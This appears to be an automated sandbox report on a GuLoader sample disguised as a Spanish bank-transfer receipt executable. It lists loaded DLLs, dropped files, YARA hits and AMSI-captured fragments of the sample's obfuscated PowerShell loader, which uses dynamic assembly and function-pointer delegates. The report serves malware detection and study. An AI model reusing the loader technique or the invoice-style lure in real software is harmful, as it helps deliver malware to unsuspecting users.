Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

File written: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Dareful.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: justificante de transferencia09454545.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.1326076402.000000000A3AC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2187374741.0000000004C1C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gagernes $Rikkos $Ationsprogrammer), (Finansordfrer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Havrnene11 = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Understrygningerne)), $Indstvningsmpulsens).DefineDynamicModule($Courtnay, $false).DefineType($Smerglendes, $Programdisk, [System.Mult

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04BDEAF8 push eax; mov dword ptr [esp], edx	1_2_04BDEB0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0986338C push 8BD68B50h; retf	1_2_098633A6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09862EF8 push 8BD38B50h; iretd	1_2_09862EFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_098709A9 push ds; iretd	1_2_098709DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09872D35 push ecx; iretd	1_2_09872D75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0987176A push ebx; ret	1_2_0987178D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_098746A1 push B91C1EECh; iretd	1_2_0987466D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09874642 push B91C1EECh; iretd	1_2_0987466D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09874A4C push esp; retf	1_2_09874ADC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E4A4C push esp; retf	11_2_040E4ADC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E4642 push B91C1EECh; iretd	11_2_040E466D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E46A1 push B91C1EECh; iretd	11_2_040E466D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E2D35 push ecx; iretd	11_2_040E2D75
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E176A push ebx; ret	11_2_040E178D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_040E09A9 push ds; iretd	11_2_040E09DA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_210529E0 push ecx; ret	11_2_21053CA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21053C90 push ecx; ret	11_2_21053CA5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe			Jump to dropped file
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File created: C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
